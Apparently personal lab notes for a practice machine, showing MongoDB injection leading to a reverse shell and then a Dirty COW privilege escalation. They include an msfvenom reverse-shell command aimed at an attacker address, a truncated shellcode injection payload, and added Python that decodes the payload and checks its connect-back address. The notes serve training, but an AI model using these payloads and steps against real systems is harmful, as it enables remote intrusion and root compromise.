10.11.1.237 (Humble)

1. nmap shows that there are http and https; both serve different webpages.
2. gobuster found a suspicious directory, /web1, on the https webpage; it seems to contain a user and a hashed password.
3. gobuster also found /test, which allows the user to search against the database and might be vulnerable to SQL injection.
4. Giving it a " ' " character made it throw an error, so it should be vulnerable to SQL injection.
5. The error also gives the MongoDB version, 2.2.3; a Google search reveals a potential reverse shell vulnerability: https://www.exploit-db.com/exploits/24947
6. The exploit states that it requires a JavaScript payload as shellcode, so I used msfvenom to generate the payload:
   msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.218 LPORT=1234 CMD=/bin/bash -f js_le -e generic/none
7. After 10000 years of modifying the payload, I finally made it work (I was stuck on not removing the collection.find({'$where':' prefix). Payload:
   aaaa'; shellcode=unescape("%udb31%ue3f7%u4353%u6a53%u8902%ub0e1%ucd66%u9380%ub059%ucd3f%u4980%uf979%uc068%u77a8%u68da%u0002%ud204%ue189%u66
8. Obtained a reverse shell as mongodb.
9. We realise that the kernel version is quite old, so it might be vulnerable to Dirty COW (for Debian distros it was only fixed in 3.16.36, and this machine's version is 3.2.0, so it should be vulnerable).
10. Run the Dirty COW exploit and get a root shell.
11. Get proof.
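The js_le output used in steps 6 and 7 is just the raw shellcode re-packed as little-endian 16-bit words for JavaScript's unescape(). The Python below is an added example (not part of the original notes, of msfvenom, or of the exploit) that encodes and decodes that format and then pulls the connect-back address out of the two "push imm32" instructions that build the sockaddr_in in linux/x86/shell_reverse_tcp. Run on the 18 complete words quoted in step 7 it recovers LHOST 192.168.119.218 and LPORT 1234, i.e. it lets you verify a massaged payload still carries the msfvenom parameters from step 6. The NOP padding for odd lengths and the push-pattern heuristic are assumptions of this example, not documented msfvenom behaviour.

```python
import re
import struct

# The 18 complete %uXXXX words from step 7 of these notes (the trailing "%u66"
# is cut off in the source and is left out here).
PAGE_FRAGMENT = ("%udb31%ue3f7%u4353%u6a53%u8902%ub0e1%ucd66%u9380%ub059%ucd3f"
                 "%u4980%uf979%uc068%u77a8%u68da%u0002%ud204%ue189")


def js_le_encode(shellcode: bytes) -> str:
    """Re-pack raw shellcode as js_le: each byte pair becomes one %uXXXX escape
    with the second byte written first, because unescape() stores the word as a
    little-endian UTF-16 code unit (low byte at the lower address)."""
    if len(shellcode) % 2:
        # Assumption for this example: pad an odd-length buffer with a NOP so the
        # final word is complete. msfvenom's own padding rule is not checked here.
        shellcode = shellcode + b"\x90"
    return "".join("%%u%02x%02x" % (shellcode[i + 1], shellcode[i])
                   for i in range(0, len(shellcode), 2))


def js_le_decode(escaped: str) -> bytes:
    """Inverse of js_le_encode: read every %uXXXX word and emit low byte, high byte."""
    out = bytearray()
    for word in re.findall(r"%u([0-9a-fA-F]{4})", escaped):
        out.append(int(word[2:4], 16))  # low byte of the word comes first in memory
        out.append(int(word[0:2], 16))  # then the high byte
    return bytes(out)


def sockaddr_from_shellcode(code: bytes):
    """Heuristic for linux/x86/shell_reverse_tcp: the connect() target is built
    with two back-to-back 'push imm32' (opcode 0x68):
        push <sin_addr>            ; 4 bytes of the IPv4 address
        push <sin_family|sin_port> ; 0x0002 (AF_INET, LE) then port (network order)
    Return (ip, port) for the first pair whose family field is AF_INET, else None."""
    for i in range(len(code) - 9):
        if code[i] == 0x68 and code[i + 5] == 0x68:
            addr = code[i + 1:i + 5]
            fam_port = code[i + 6:i + 10]
            family = struct.unpack("<H", fam_port[:2])[0]   # little-endian short
            port = struct.unpack(">H", fam_port[2:])[0]     # big-endian (network) short
            if family == 2:  # AF_INET
                return ".".join(str(b) for b in addr), port
    return None


if __name__ == "__main__":
    raw = js_le_decode(PAGE_FRAGMENT)
    print(raw.hex())
    print(sockaddr_from_shellcode(raw))        # ('192.168.119.218', 1234)
    assert js_le_encode(raw) == PAGE_FRAGMENT  # round trip
```

Because the connect-back address is embedded as immediates, any edit that shifts or corrupts those 10 bytes (an accidental truncation like the one in the note above, or an unescape() quoting mistake) is caught by the round trip and the sockaddr check before you burn another attempt against the target.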